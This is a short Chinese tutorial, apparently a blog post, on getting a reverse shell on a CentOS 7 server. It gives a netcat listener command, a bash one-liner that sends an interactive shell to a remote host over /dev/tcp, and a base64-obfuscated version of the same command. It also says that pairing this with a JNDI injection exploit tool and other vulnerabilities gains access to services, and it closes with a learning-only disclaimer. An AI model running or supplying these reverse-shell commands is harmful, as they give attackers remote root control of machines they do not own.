CentOS7 反向建立ssh

目标

0、准备A B两台服务器

1、B服务器监听某个端口

2、A服务器向该端口发送请求

3、B服务器接收到该请求后直接临时拿到A服务器的的root SSH会话

 

操作

1、B服务器监听9876：

 nc -lvvp 9876

 

2、A服务器向B发送请求

A 明文版

bash -i >& /dev/tcp/[ip]/[port] 0>&1

B base 64版(示例）

bash -c {echo,YmFz这个就是BASE64字符串==}|{base64,-d}|{bash,-i}

示例中的的BASE64明文即为“bash -i >& /dev/tcp/[ip]/[port] 0>&1"

 

3、查看B的控制台，已经临时获取了一个ssh会话，可操作A，权限是root

 

配合项目：【https://github.com/welk1n/JNDI-Injection-Exploit】以及一些漏洞，可实现一些服务权限获取

 

注意：非法入侵别人电脑是违法行为，本文仅供学习，请勿非法使用本文所提技术。